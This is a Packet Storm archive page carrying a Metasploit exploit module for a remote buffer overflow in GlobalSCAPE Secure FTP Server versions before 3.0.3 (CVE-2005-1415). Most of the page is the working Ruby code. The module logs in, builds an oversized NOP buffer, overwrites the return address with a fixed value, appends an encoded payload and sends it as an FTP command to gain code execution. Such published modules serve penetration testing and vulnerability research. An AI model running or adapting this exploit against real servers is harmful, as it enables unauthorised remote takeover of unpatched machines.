exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

GlobalSCAPE Secure FTP Server Input Overflow

GlobalSCAPE Secure FTP Server Input Overflow
Posted Nov 26, 2009
Authored by Mati Aharoni, riaf | Site metasploit.com

This Metasploit module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server. All versions prior to 3.0.3 are affected by this flaw. A valid user account ( or anonymous access) is required for this exploit to work.

tags | exploit, overflow
advisories | CVE-2005-1415
SHA-256 | f92b038b30321d1e394a2a78f7f7a4672a2b84c28b02a128fdaf5a46600f586c

GlobalSCAPE Secure FTP Server Input Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Ftp

def initialize(info = {})
super(update_info(info,
'Name' => 'GlobalSCAPE Secure FTP Server Input Overflow',
'Description' => %q{
This module exploits a buffer overflow in the GlobalSCAPE Secure FTP Server.
All versions prior to 3.0.3 are affected by this flaw. A valid user account (
or anonymous access) is required for this exploit to work.
},
'Author' => [ 'Fairuzan Roslan <riaf [at] mysec.org>', 'Mati Aharoni <mati [at] see-security.com>' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-1415'],
[ 'OSVDB', '16049'],
[ 'BID', '13454'],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2005-04/0674.html'],
],
'Privileged' => false,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x20\x61\x62\x63\x64\x65\x66\x67\x68\x69" +
"\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74" +
"\x75\x76\x77\x78\x79\x7a",
'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",

},
'Targets' =>
[
[
'GlobalSCAPE Secure FTP Server <= 3.0.2 Universal',
{
'Platform' => 'win',
'Ret' => 0x1002f01f,
},
],
],
'DisclosureDate' => 'May 1 2005',
'DefaultTarget' => 0))
end

def exploit
connect_login

buf = make_nops(3047)
buf[2043, 4] = [ target.ret ].pack('V')
buf[2047, payload.encoded.length] = payload.encoded

send_cmd( [buf] )

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close